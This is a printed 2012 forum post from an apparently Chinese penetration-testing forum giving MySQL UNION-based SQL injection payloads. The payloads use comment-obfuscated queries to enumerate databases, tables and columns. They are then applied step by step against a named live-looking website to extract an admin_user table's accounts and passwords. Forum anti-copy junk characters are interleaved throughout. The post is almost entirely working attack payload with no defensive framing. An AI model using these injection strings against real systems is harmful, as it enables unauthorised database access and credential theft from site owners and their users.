中国网络渗透测试联盟

标题: mysql注入技巧 [打印本页]

作者: admin    时间: 2012-9-13 16:29
标题: mysql注入技巧
查库0 f& n8 ], I/ I4 Q( c

; Z  t4 s& B+ G/ m4 n5 l$ t0 a% v) Kid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*
3 D* V: ~% B' f4 p5 m3 d; x( y2 d
查表  m7 X8 O3 w9 f5 y

; J+ _8 P; E" @) g' wid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1$ {2 F  _0 Y( D; \5 Y5 Z2 T9 y
* P; u8 e/ Q1 s% T- g+ e/ D) h0 _
查段# f8 N1 ^  `4 A3 j" _4 _* h
8 |$ M# n7 a. ]0 q0 U: K6 O. F
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
' K; X5 E& d+ N+ }1 Q" Q# I: E$ t: u, x  V$ ~) c- O1 f* d3 k
" i4 \, E/ C/ D/ d: [
mysql5高级注入方法暴表! Q! V2 S* w* f/ k+ a% g

/ t" L) e6 c4 k6 `9 c& W0 T例子如下:' M4 p% w8 k  w

' E/ l5 U1 B" D4 w' E1.爆表& q3 }4 {5 D1 f- ?' {
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
; `; R. \- s  D, W4 ]) Y# ^这样爆到第4个时出现了admin_user表。
# Y9 u& L$ `& ~$ _$ c5 D7 l" Q- R( y5 K: [
2.暴字段5 h) e5 Y0 Q# R% q4 [- g4 q
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*" k# n( o* ]7 W. w

: v/ H+ D* b9 ^3 z0 `0 \4 F
& @" y: t: n7 y3.爆密码
3 I" k! z' |: ^) n& Nhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 2 K% Z0 T# k: D3 x4 A

% ?* M% h8 U# z( Q; m* _( B) x7 _! |





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2